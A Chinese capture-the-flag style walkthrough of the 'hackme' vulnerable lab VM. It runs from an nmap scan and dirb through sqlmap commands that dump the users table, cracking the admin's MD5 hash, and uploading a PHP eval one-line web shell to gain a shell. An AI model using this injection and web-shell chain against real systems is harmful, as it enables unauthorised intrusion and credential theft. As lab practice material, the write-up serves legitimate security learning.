1.安装靶机

点击  hackme.ova   文件，直接导入虚拟机，选择存储位置

2. 开启靶机

3. kali扫描同C段的ip，找到靶机ip

nmap  192.168.182.1/24

经判断，靶机ip为：192.168.182.157

开启端口 http 80  、ssh 远程连接 22 

4.  浏览器访问ip

显示一个登录界面，有输入框，可能存在SQL注入    存在注册连接，后面可能会有用

5. kali的dirb扫描敏感目录：dirb "http://ip"

6.访问  index.php   和  /uploads/  两个网址

 index.php访问仍是登录界面

http://192.168.182.157/uploads/   发现上传文件的目录，无上传位置，暂时没思路操作

7. 返回登录界面http://ip,注册一个用户，进行登录

登录成功，出现搜索框，尝试sql注入

8.  寻找注入

直接点击search，发现弹出多个书籍信息，选一个作为值进行注入判断过程

9.  使用OSINT，使用BurpSuite抓包，保存数据包为txt文件

10. kali使用sqlmap工具爆破

爆破数据库输入：sqlmap -r '/home/kali/Desktop/test.txt' --dbs 

发现一个数据库： webapphacking

爆破数据表：sqlmap -r '/home/kali/Desktop/test.txt' -D webapphacking --tables

发现users表

 爆破表数据：sqlmap -r '/home/kali/Desktop/test.txt' -D webapphacking -T users --dump

发现superadmin用户，密码：2386acb2cf356944177746fc92523983

32位，采用hash加密，尝试md5解码

md5解码网址：MD5免费在线解密破解_MD5在线加密-SOMD5

密码：Uncrackable

11.使用superadmin用户登录

退出账号后，再重新登录

出现上传界面，结合之前的/uploads/可查看上传文件的目录，尝试上传木马文件

12. 上传一句话木马文件进行尝试

<?php @eval($_POST['cmd']);?>

 发现一句话木马直接上传成功

13.访问/uploads/页面，访问该木马文件

输入：http://192.168.182.157/uploads/

点击文件test1.php，进行访问    访问成功

14. 蚁剑尝试连接

连接成功，获取了shell

 

hackme文件解析漏洞靶机，此次练习仅做到获取shell。

练习到此结束，希望对各位有所帮助吧。仅供参考，有所不足请大家多见谅。

                                                                                                        ---------------2025/3/13  23;45